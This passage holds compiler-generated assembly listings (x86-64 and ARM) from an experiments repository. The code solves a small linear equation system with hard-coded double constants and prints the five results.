.cfi_def_cfa_offset 48
.cfi_offset 6, -48
pushq %rbx
.cfi_def_cfa_offset 56
.cfi_offset 3, -56
movl %ecx, %ebp
movl %r8d, %ebx
movl %edx, %r12d
movq %rdi, %r13
subq $24, %rsp
.cfi_def_cfa_offset 80
cmpl %r15d, %r8d
je .L16
movl %r8d, %r9d
movl %ecx, %edx
movl %r15d, %r8d
call aijn.part.0
movl %ebx, %r8d
movl %r15d, %ecx
movl %r12d, %edx
movq %r14, %rsi
movq %r13, %rdi
movsd %xmm0, (%rsp)
call bin
movsd (%rsp), %xmm3
movl %ebx, %r9d
movl %r15d, %r8d
movl %ebp, %ecx
movl %r12d, %edx
mulsd %xmm0, %xmm3
movq %r14, %rsi
movq %r13, %rdi
movsd %xmm3, 8(%rsp)
call aijn.part.0
movsd %xmm0, (%rsp)
.L13:
movl %ebx, %r8d
movl %r15d, %ecx
movl %ebp, %edx
movq %r14, %rsi
movq %r13, %rdi
call bin
mulsd (%rsp), %xmm0
movsd 8(%rsp), %xmm1
addq $24, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 56
popq %rbx
.cfi_restore 3
.cfi_def_cfa_offset 48
popq %rbp
.cfi_restore 6
.cfi_def_cfa_offset 40
popq %r12
.cfi_restore 12
.cfi_def_cfa_offset 32
popq %r13
.cfi_restore 13
.cfi_def_cfa_offset 24
subsd %xmm0, %xmm1
popq %r14
.cfi_restore 14
.cfi_def_cfa_offset 16
popq %r15
.cfi_restore 15
.cfi_def_cfa_offset 8
movapd %xmm1, %xmm0
ret
.p2align 4,,10
.p2align 3
.L16:
.cfi_restore_state
movl %r8d, %ecx
call bin
movl %ebp, %eax
imull %ebx, %eax
imull %ebx, %r12d
addl %ebp, %eax
cltq
addl %ebp, %r12d
mulsd 0(%r13,%rax,8), %xmm0
movslq %r12d, %r12
movsd 0(%r13,%r12,8), %xmm5
movsd %xmm5, (%rsp)
movsd %xmm0, 8(%rsp)
jmp .L13
.p2align 4,,10
.p2align 3
.L15:
.cfi_def_cfa_offset 8
.cfi_restore 3
.cfi_restore 6
.cfi_restore 12
.cfi_restore 13
.cfi_restore 14
.cfi_restore 15
movslq %edx, %rdx
movsd (%rsi,%rdx,8), %xmm0
ret
.cfi_endproc
.LFE13:
.size bin, .-bin
.section .text.unlikely
.LCOLDE3:
.text
.LHOTE3:
.section .text.unlikely
.LCOLDB4:
.text
.LHOTB4:
.p2align 4,,15
.globl solve_xi
.type solve_xi, @function
solve_xi:
.LFB14:
.cfi_startproc
pushq %r15
.cfi_def_cfa_offset 16
.cfi_offset 15, -16
leal 1(%rcx), %r15d
pushq %r14
.cfi_def_cfa_offset 24
.cfi_offset 14, -24
pushq %r13
.cfi_def_cfa_offset 32
.cfi_offset 13, -32
pushq %r12
.cfi_def_cfa_offset 40
.cfi_offset 12, -40
movq %rdx, %r13
pushq %rbp
.cfi_def_cfa_offset 48
.cfi_offset 6, -48
pushq %rbx
.cfi_def_cfa_offset 56
.cfi_offset 3, -56
movl %ecx, %ebx
movl %ebx, %edx
movl %r15d, %ecx
movq %rdi, %rbp
subq $40, %rsp
.cfi_def_cfa_offset 96
movl %r8d, %r14d
movq %rsi, 16(%rsp)
call bin
testl %ebx, %ebx
movapd %xmm0, %xmm1
jle .L18
movl %r15d, %eax
leal -1(%rbx), %r12d
imull %ebx, %eax
movl %eax, 28(%rsp)
leaq 1(%r12), %rax
xorl %r12d, %r12d
movq %rax, (%rsp)
jmp .L21
.p2align 4,,10
.p2align 3
.L26:
movl 28(%rsp), %eax
leal (%rax,%r12), %edx
movslq %edx, %rdx
movsd 0(%rbp,%rdx,8), %xmm0
.L20:
mulsd 0(%r13,%r12,8), %xmm0
addq $1, %r12
cmpq (%rsp), %r12
subsd %xmm0, %xmm1
je .L18
.L21:
cmpl %r14d, %r15d
je .L26
movq 16(%rsp), %rsi
movl %r14d, %r9d
movl %r15d, %r8d
movl %r12d, %ecx
movl %ebx, %edx
movq %rbp, %rdi
movsd %xmm1, 8(%rsp)
call aijn.part.0
movsd 8(%rsp), %xmm1
jmp .L20
.p2align 4,,10
.p2align 3
.L18:
movslq %ebx, %rax
cmpl %r14d, %r15d
leaq 0(%r13,%rax,8), %r12
je .L27
movq 16(%rsp), %rsi
movl %r14d, %r9d
movl %r15d, %r8d
movl %ebx, %ecx
movl %ebx, %edx
movq %rbp, %rdi
movsd %xmm1, (%rsp)
call aijn.part.0
movsd (%rsp), %xmm1
.L23:
divsd %xmm0, %xmm1
movsd %xmm1, (%r12)
addq $40, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 56
popq %rbx
.cfi_def_cfa_offset 48
popq %rbp
.cfi_def_cfa_offset 40
popq %r12
.cfi_def_cfa_offset 32
popq %r13
.cfi_def_cfa_offset 24
popq %r14
.cfi_def_cfa_offset 16
popq %r15
.cfi_def_cfa_offset 8
ret
.p2align 4,,10
.p2align 3
.L27:
.cfi_restore_state
movl %r15d, %r10d
imull %ebx, %r10d
addl %r10d, %ebx
movslq %ebx, %rbx
movsd 0(%rbp,%rbx,8), %xmm0
jmp .L23
.cfi_endproc
.LFE14:
.size solve_xi, .-solve_xi
.section .text.unlikely
.LCOLDE4:
.text
.LHOTE4:
.section .text.unlikely
.LCOLDB5:
.text
.LHOTB5:
.p2align 4,,15
.globl runtime_solve
.type runtime_solve, @function
runtime_solve:
.LFB15:
.cfi_startproc
testl %ecx, %ecx
jle .L36
pushq %r14
.cfi_def_cfa_offset 16
.cfi_offset 14, -16
movq %rdi, %r14
pushq %r13
.cfi_def_cfa_offset 24
.cfi_offset 13, -24
movq %rsi, %r13
pushq %r12
.cfi_def_cfa_offset 32
.cfi_offset 12, -32
movq %rdx, %r12
pushq %rbp
.cfi_def_cfa_offset 40
.cfi_offset 6, -40
movl %ecx, %ebp
pushq %rbx
.cfi_def_cfa_offset 48
.cfi_offset 3, -48
xorl %ebx, %ebx
.p2align 4,,10
.p2align 3
.L32:
movl %ebx, %ecx
movl %ebp, %r8d
movq %r12, %rdx
movq %r13, %rsi
movq %r14, %rdi
addl $1, %ebx
call solve_xi
cmpl %ebx, %ebp
jne .L32
popq %rbx
.cfi_restore 3
.cfi_def_cfa_offset 40
popq %rbp
.cfi_restore 6
.cfi_def_cfa_offset 32
popq %r12
.cfi_restore 12
.cfi_def_cfa_offset 24
popq %r13
.cfi_restore 13
.cfi_def_cfa_offset 16
popq %r14
.cfi_restore 14
.cfi_def_cfa_offset 8
.L36:
rep ret
.cfi_endproc
.LFE15:
.size runtime_solve, .-runtime_solve
.section .text.unlikely
.LCOLDE5:
.text
.LHOTE5:
.section .rodata.str1.1,"aMS",@progbits,1
.LC11:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely
.LCOLDB12:
.section .text.startup,"ax",@progbits
.LHOTB12:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB16:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
pushq %rbx
.cfi_def_cfa_offset 24
.cfi_offset 3, -24
movl $.LC0, %esi
movl $25, %ecx
xorl %ebx, %ebx
subq $312, %rsp
.cfi_def_cfa_offset 336
leaq 96(%rsp), %rbp
movsd .LC6(%rip), %xmm5
movsd .LC7(%rip), %xmm6
movq %rbp, %rdi
movsd .LC8(%rip), %xmm7
rep movsq
movsd .LC9(%rip), %xmm0
movsd .LC10(%rip), %xmm1
movq %fs:40, %rax
movq %rax, 296(%rsp)
xorl %eax, %eax
movsd %xmm5, (%rsp)
movsd %xmm6, 8(%rsp)
movsd %xmm7, 16(%rsp)
movsd %xmm0, 24(%rsp)
movsd %xmm1, 32(%rsp)
.L38:
leaq 48(%rsp), %rdx
movl %ebx, %ecx
movl $5, %r8d
movq %rsp, %rsi
movq %rbp, %rdi
addl $1, %ebx
call solve_xi
cmpl $5, %ebx
jne .L38
movsd 80(%rsp), %xmm4
movl $.LC11, %esi
movl $1, %edi
movsd 72(%rsp), %xmm3
movl $5, %eax
movsd 64(%rsp), %xmm2
movsd 56(%rsp), %xmm1
movsd 48(%rsp), %xmm0
call __printf_chk
xorl %eax, %eax
movq 296(%rsp), %rcx
xorq %fs:40, %rcx
jne .L42
addq $312, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 24
popq %rbx
.cfi_def_cfa_offset 16
popq %rbp
.cfi_def_cfa_offset 8
ret
.L42:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE16:
.size main, .-main
.section .text.unlikely
.LCOLDE12:
.section .text.startup
.LHOTE12:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC6:
.long 3779571220
.long 1074795642
.align 8
.LC7:
.long 1546188227
.long 1075364495
.align 8
.LC8:
.long 3607772529
.long -1071615837
.align 8
.LC9:
.long 343597384
.long -1071757394
.align 8
.LC10:
.long 2748779069
.long -1073201808
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 6,930
|
exp/static_c/exp/arm_asm/exp_volatile_a_static_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_volatile_a_static_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 368
@ frame_needed = 0, uses_anonymous_args = 0
push {lr}
movw r1, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r1, #:upper16:.LANCHOR0
movs r2, #200
sub sp, sp, #404
add r0, sp, #200
bl memcpy
fldd d7, [sp, #200]
movw r0, #:lower16:.LC2
movt r0, #:upper16:.LC2
fldd d6, [sp, #208]
fldd d5, [sp, #216]
fldd d3, [sp, #224]
fldd d12, [sp, #232]
fldd d2, [sp, #240]
fldd d1, [sp, #248]
fldd d8, [sp, #256]
fstd d7, [sp, #120]
fstd d8, [sp, #136]
fldd d8, [sp, #264]
fldd d13, [sp, #272]
fldd d9, [sp, #280]
fldd d10, [sp, #288]
fldd d11, [sp, #296]
fldd d14, [sp, #304]
fstd d6, [sp, #96]
fstd d5, [sp, #104]
fldd d6, [sp, #312]
fstd d14, [sp, #64]
fldd d7, [sp, #320]
fldd d14, [sp, #328]
fldd d15, [sp, #336]
fldd d5, [sp, #344]
fstd d3, [sp, #72]
fstd d2, [sp, #112]
fstd d1, [sp, #128]
fstd d9, [sp, #144]
fstd d10, [sp, #152]
fstd d11, [sp, #160]
fstd d5, [sp, #176]
fldd d11, [sp, #352]
fstd d7, [sp, #168]
fldd d7, [sp, #360]
fldd d3, .L3
fcpyd d4, d7
fldd d7, [sp, #368]
fstd d4, [sp, #32]
fcpyd d5, d7
fldd d7, [sp, #376]
fmuld d0, d11, d5
fstd d5, [sp, #40]
fcpyd d1, d7
fmuld d7, d11, d3
fldd d3, [sp, #384]
fstd d1, [sp, #48]
fcpyd d9, d3
fstd d7, [sp, #80]
fmuld d2, d13, d9
fldd d7, [sp, #392]
fldd d3, .L3+8
fstd d9, [sp, #88]
fmuld d5, d6, d9
fmuld d1, d11, d1
fcpyd d10, d2
fldd d2, [sp, #80]
fmscd d10, d8, d7
fcpyd d8, d0
fldd d0, [sp, #88]
fmscd d8, d14, d7
fldd d14, [sp, #64]
fmscd d5, d14, d7
fstd d8, [sp, #56]
fcpyd d14, d1
fldd d1, [sp, #48]
fmscd d14, d15, d7
fldd d15, [sp, #72]
fmuld d4, d11, d4
fstd d14, [sp, #64]
fldd d14, [sp, #168]
fmscd d2, d7, d3
fcpyd d3, d4
fldd d4, [sp, #32]
fmscd d3, d14, d7
fldd d14, [sp, #176]
fstd d2, [sp, #80]
fldd d2, .L3+16
fmuld d9, d12, d9
fstd d3, [sp, #72]
fldd d3, [sp, #40]
fmuld d8, d13, d1
fmuld d11, d11, d0
fmuld d0, d6, d3
fmuld d1, d12, d1
fmscd d9, d15, d7
fldd d15, .L3
fmscd d11, d14, d7
fmuld d3, d6, d15
fldd d15, [sp, #136]
fcpyd d14, d8
fldd d8, [sp, #152]
fmscd d14, d15, d7
fcpyd d15, d0
fldd d0, [sp, #104]
fmscd d15, d8, d7
fmuld d4, d6, d4
fcpyd d8, d1
fldd d1, [sp, #48]
fmscd d8, d0, d7
fldd d0, [sp, #144]
fmscd d3, d7, d2
fstd d8, [sp, #104]
fmscd d4, d0, d7
fldd d0, [sp, #32]
fstd d3, [sp, #152]
fldd d3, [sp, #40]
fmuld d8, d12, d0
fstd d4, [sp, #168]
fmuld d6, d6, d1
fstd d8, [sp, #192]
fldd d1, .L3+24
fldd d8, [sp, #56]
fmuld d4, d12, d3
fldd d3, .L3
fmuld d2, d13, d3
fmuld d3, d13, d0
fldd d0, [sp, #160]
fmscd d6, d0, d7
fldd d0, .L3
fstd d6, [sp, #136]
fldd d6, [sp, #96]
fmscd d2, d7, d1
fmscd d4, d6, d7
fldd d6, [sp, #64]
fstd d2, [sp, #160]
fldd d2, [sp, #112]
fstd d4, [sp, #144]
fmuld d4, d10, d6
fmuld d12, d12, d0
fmscd d4, d11, d14
fstd d12, [sp, #184]
fcpyd d12, d3
fmuld d8, d8, d5
fmscd d12, d2, d7
fcpyd d14, d4
fstd d12, [sp, #176]
fcpyd d4, d8
fldd d12, [sp, #80]
fmscd d4, d11, d15
fldd d8, [sp, #152]
fldd d15, [sp, #104]
fmuld d0, d5, d12
fstd d4, [sp, #96]
fmuld d1, d6, d9
fldd d6, [sp, #40]
fmuld d3, d13, d6
fldd d13, [sp, #72]
fldd d6, .L3+32
fmuld d2, d5, d13
fcpyd d4, d0
fmscd d4, d11, d8
fldd d8, [sp, #168]
fmscd d2, d11, d8
fstd d4, [sp, #104]
fldd d4, [sp, #64]
fldd d8, [sp, #56]
fmscd d1, d11, d15
fstd d2, [sp, #112]
fldd d2, [sp, #192]
fmuld d5, d5, d4
fldd d4, [sp, #120]
fmscd d2, d4, d7
fcpyd d15, d1
fldd d1, [sp, #128]
fmuld d8, d8, d9
fstd d2, [sp, #120]
fldd d2, [sp, #56]
fmscd d3, d1, d7
fldd d1, [sp, #184]
fcpyd d0, d12
fmuld d12, d10, d12
fmuld d13, d10, d13
fmscd d1, d7, d6
fldd d6, [sp, #136]
fmscd d5, d11, d6
fldd d6, [sp, #144]
fmscd d8, d11, d6
fldd d6, [sp, #160]
fmscd d12, d11, d6
fldd d6, [sp, #176]
fmscd d13, d11, d6
fldd d6, [sp, #72]
fmuld d2, d10, d2
fcpyd d4, d3
fldd d3, [sp, #96]
fmuld d10, d9, d0
fmuld d9, d9, d6
fldd d6, [sp, #104]
fldd d0, [sp, #112]
fmuld d0, d14, d0
fmuld d6, d14, d6
fmuld d3, d3, d15
fmscd d2, d4, d11
fldd d4, [sp, #120]
fmscd d10, d11, d1
fmscd d9, d11, d4
fmscd d0, d5, d13
fldd d13, [sp, #96]
fmscd d6, d5, d12
fldd d12, [sp, #104]
fmuld d4, d14, d13
fldd d14, [sp, #112]
fmscd d3, d5, d8
fmuld d1, d15, d14
fmuld d8, d15, d12
fmscd d4, d2, d5
fmscd d8, d5, d10
fldd d10, [sp, #80]
fmscd d1, d5, d9
fmuld d2, d3, d6
fmuld d3, d3, d0
fmscd d2, d4, d8
fmscd d3, d4, d1
fldd d1, [sp, #48]
fdivd d3, d2, d3
fldd d2, [sp, #56]
fnmacd d6, d3, d0
fldd d0, [sp, #32]
fmrrd r2, r3, d3
fdivd d4, d6, d4
fnmacd d12, d3, d14
fstd d4, [sp]
fcpyd d6, d12
fnmacd d6, d4, d13
fldd d13, [sp, #72]
fdivd d6, d6, d5
fldd d5, [sp, #64]
fnmacd d10, d3, d13
fstd d6, [sp, #8]
fnmacd d10, d4, d2
fnmacd d10, d6, d5
fldd d5, .L3
fnmacd d5, d0, d3
fldd d3, [sp, #40]
fldd d0, [sp, #88]
fdivd d10, d10, d11
fnmacd d5, d3, d4
fstd d10, [sp, #16]
fnmacd d5, d1, d6
fcpyd d6, d5
fnmacd d6, d0, d10
fdivd d7, d6, d7
fstd d7, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #404
@ sp needed
fldmfdd sp!, {d8-d15}
ldr pc, [sp], #4
.L4:
.align 3
.L3:
.word -1546188227
.word -1073201808
.word 343597384
.word -1071757394
.word -687194767
.word -1071615837
.word 1546188227
.word 1075364495
.word -515396076
.word 1074795642
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 5,667
|
exp/static_c/exp/arm_asm/exp_triangular_matrix.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_triangular_matrix.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 368
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, lr}
movw r4, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r4, #:upper16:.LANCHOR0
mov r1, r4
movs r2, #200
adds r4, r4, #200
sub sp, sp, #404
add r0, sp, #200
add r5, sp, #160
bl memcpy
fldd d7, [sp, #200]
ldmia r4!, {r0, r1, r2, r3}
fldd d6, [sp, #240]
fstd d7, [sp, #72]
fldd d5, [sp, #248]
fstd d6, [sp, #56]
fldd d4, [sp, #280]
fldd d13, [sp, #288]
fldd d1, [sp, #296]
fldd d9, [sp, #320]
fldd d6, [sp, #328]
fldd d2, [sp, #336]
fldd d10, [sp, #344]
fldd d7, [sp, #360]
fstd d5, [sp, #80]
fcpyd d12, d7
fldd d7, [sp, #368]
fstd d1, [sp, #96]
fcpyd d1, d7
fldd d7, [sp, #376]
fldd d5, [sp, #384]
fldd d11, [sp, #392]
stmia r5!, {r0, r1, r2, r3}
ldmia r4!, {r0, r1, r2, r3}
fcpyd d14, d5
fldd d3, .L3
fstd d4, [sp, #88]
stmia r5!, {r0, r1, r2, r3}
ldmia r4, {r0, r1}
fmuld d4, d7, d3
fstd d7, [sp, #120]
stmia r5, {r0, r1}
movw r0, #:lower16:.LC2
fldd d0, [sp, #160]
movt r0, #:upper16:.LC2
fldd d15, [sp, #168]
fldd d7, [sp, #176]
fldd d8, [sp, #184]
fldd d5, [sp, #192]
fstd d0, [sp, #136]
fmuld d0, d5, d3
fstd d5, [sp, #144]
fstd d12, [sp, #104]
fstd d1, [sp, #112]
fstd d14, [sp, #128]
fmuld d5, d12, d3
fcpyd d12, d0
fmscd d12, d11, d8
fmuld d1, d1, d3
fcpyd d8, d12
fcpyd d12, d4
fmscd d12, d2, d11
fcpyd d2, d1
fstd d12, [sp, #48]
fmscd d2, d6, d11
fcpyd d6, d5
fstd d2, [sp, #40]
fmscd d6, d9, d11
fcpyd d9, d0
fstd d6, [sp, #64]
fmscd d9, d11, d7
fmuld d14, d14, d3
fmuld d3, d11, d3
fcpyd d12, d9
fstd d3, [sp, #32]
fcpyd d9, d14
fmscd d9, d10, d11
fldd d10, [sp, #48]
fsubd d14, d3, d14
fldd d3, [sp, #88]
fstd d8, [sp, #88]
fcpyd d2, d1
fmuld d6, d14, d10
fldd d10, [sp, #64]
fmscd d2, d13, d11
fldd d13, [sp, #40]
fcpyd d7, d9
fmuld d13, d14, d13
fmuld d8, d14, d8
fcpyd d9, d5
fmuld d14, d14, d10
fcpyd d10, d0
fmscd d9, d3, d11
fldd d3, [sp, #96]
fmscd d10, d11, d15
fcpyd d15, d4
fmscd d15, d3, d11
fldd d3, [sp, #32]
fstd d15, [sp, #96]
fsubd d4, d3, d4
fldd d3, [sp, #56]
fcpyd d15, d5
fmscd d15, d3, d11
fldd d3, [sp, #32]
fstd d15, [sp, #152]
fcpyd d15, d8
fmscd d15, d7, d12
fcpyd d12, d13
fstd d15, [sp, #56]
fmscd d12, d7, d2
fcpyd d15, d6
fcpyd d2, d14
fmscd d15, d7, d4
fmscd d2, d7, d9
fldd d9, [sp, #136]
fcpyd d4, d15
fcpyd d15, d2
fldd d2, [sp, #80]
fsubd d3, d3, d1
fmscd d1, d2, d11
fldd d2, [sp, #72]
fmscd d5, d2, d11
fcpyd d2, d8
fmscd d2, d7, d10
fmscd d0, d11, d9
fstd d2, [sp, #32]
fldd d9, [sp, #96]
fcpyd d2, d13
fmscd d6, d7, d9
fldd d9, [sp, #152]
fmscd d2, d7, d3
fcpyd d3, d14
fmscd d3, d7, d9
fcpyd d10, d3
fldd d3, [sp, #56]
fmscd d8, d7, d0
fmuld d9, d4, d3
fmuld d3, d4, d12
fmscd d14, d7, d5
fcpyd d0, d13
fldd d13, [sp, #32]
fcpyd d5, d9
fmscd d5, d6, d13
fcpyd d13, d3
fmscd d13, d6, d2
fmuld d4, d4, d15
fmscd d0, d1, d7
fcpyd d2, d13
fcpyd d13, d4
fmscd d13, d6, d10
fldd d10, [sp, #48]
fmscd d3, d0, d6
fmscd d4, d6, d14
fldd d14, [sp, #128]
fmscd d9, d6, d8
fmuld d1, d2, d5
fmuld d2, d2, d13
fmscd d1, d3, d9
fmscd d2, d3, d4
fldd d4, [sp, #144]
fdivd d2, d1, d2
fldd d1, [sp, #64]
fnmacd d5, d2, d13
fldd d13, [sp, #40]
fmrrd r2, r3, d2
fdivd d3, d5, d3
fldd d5, [sp, #56]
fnmacd d5, d2, d15
fstd d3, [sp]
fnmacd d5, d3, d12
fldd d12, [sp, #104]
fdivd d5, d5, d6
fldd d6, [sp, #88]
fnmacd d6, d2, d1
fldd d1, [sp, #112]
fstd d5, [sp, #8]
fnmacd d6, d3, d13
fnmacd d6, d5, d10
fnmacd d4, d12, d2
fdivd d6, d6, d7
fnmacd d4, d1, d3
fstd d6, [sp, #16]
fcpyd d7, d4
fldd d4, [sp, #120]
fnmacd d7, d4, d5
fnmacd d7, d14, d6
fdivd d11, d7, d11
fstd d11, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #404
@ sp needed
fldmfdd sp!, {d8-d15}
pop {r4, r5, pc}
.L4:
.align 3
.L3:
.word 0
.word 0
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 7,267
|
exp/static_c/exp/arm_asm/exp_volatile_a_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_volatile_a_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 432
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, lr}
movw r4, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r4, #:upper16:.LANCHOR0
mov r1, r4
movs r2, #200
adds r4, r4, #200
sub sp, sp, #468
add r0, sp, #264
add r5, sp, #224
bl memcpy
fldd d7, [sp, #264]
ldmia r4!, {r0, r1, r2, r3}
fldd d6, [sp, #272]
fldd d5, [sp, #280]
fldd d4, [sp, #288]
fstd d7, [sp, #136]
fldd d11, [sp, #296]
fstd d6, [sp, #104]
fldd d3, [sp, #304]
fstd d5, [sp, #120]
fldd d2, [sp, #312]
fstd d4, [sp, #88]
fldd d1, [sp, #320]
fldd d14, [sp, #328]
fldd d12, [sp, #336]
fldd d0, [sp, #344]
fldd d8, [sp, #352]
fldd d7, [sp, #360]
fldd d6, [sp, #368]
fldd d4, [sp, #376]
fldd d5, [sp, #384]
fstd d2, [sp, #144]
fldd d15, [sp, #392]
fstd d1, [sp, #152]
fstd d0, [sp, #160]
fstd d8, [sp, #168]
fstd d7, [sp, #176]
fstd d6, [sp, #80]
fstd d5, [sp, #96]
fstd d3, [sp, #128]
fldd d3, [sp, #400]
fldd d2, [sp, #408]
fldd d6, [sp, #416]
fldd d7, [sp, #424]
fldd d5, [sp, #432]
fstd d2, [sp, #192]
fcpyd d2, d5
fldd d5, [sp, #440]
fstd d7, [sp, #32]
fcpyd d0, d5
fldd d5, [sp, #448]
fstd d3, [sp, #184]
fcpyd d8, d5
fmuld d5, d11, d7
fldd d7, [sp, #456]
stmia r5!, {r0, r1, r2, r3}
ldmia r4!, {r0, r1, r2, r3}
stmia r5!, {r0, r1, r2, r3}
ldmia r4, {r0, r1}
stmia r5, {r0, r1}
movw r0, #:lower16:.LC2
fldd d1, [sp, #224]
movt r0, #:upper16:.LC2
fstd d5, [sp, #216]
fstd d1, [sp, #200]
fldd d1, [sp, #232]
fmuld d9, d12, d8
fldd d13, [sp, #240]
fstd d1, [sp, #208]
fldd d1, [sp, #248]
fldd d5, [sp, #256]
fstd d0, [sp, #48]
fstd d2, [sp, #40]
fcpyd d3, d5
fstd d8, [sp, #112]
fmuld d10, d6, d2
fstd d3, [sp, #56]
fmuld d5, d4, d8
fmuld d0, d6, d0
fmscd d9, d14, d7
fldd d14, [sp, #80]
fmscd d10, d15, d7
fldd d15, [sp, #184]
fstd d9, [sp, #64]
fldd d9, [sp, #32]
fmscd d5, d14, d7
fstd d10, [sp, #72]
fcpyd d14, d0
fldd d0, [sp, #48]
fmscd d14, d15, d7
fldd d15, [sp, #88]
fmuld d2, d6, d3
fldd d3, [sp, #32]
fstd d14, [sp, #80]
fldd d14, [sp, #96]
fmuld d3, d6, d3
fmuld d8, d11, d8
fmscd d8, d15, d7
fcpyd d15, d3
fldd d3, [sp, #56]
fmscd d15, d14, d7
fmuld d3, d4, d3
fstd d15, [sp, #96]
fmscd d2, d7, d1
fldd d1, [sp, #112]
fmuld d6, d6, d1
fldd d1, [sp, #40]
fstd d2, [sp, #88]
fmuld d10, d12, d0
fcpyd d15, d3
fmscd d15, d7, d13
fldd d13, [sp, #192]
fmscd d6, d13, d7
fldd d13, [sp, #48]
fmuld d2, d4, d9
fmuld d1, d4, d1
fmuld d3, d4, d13
fldd d13, [sp, #152]
fcpyd d4, d10
fldd d10, [sp, #120]
fmscd d4, d13, d7
fmuld d0, d11, d0
fcpyd d13, d4
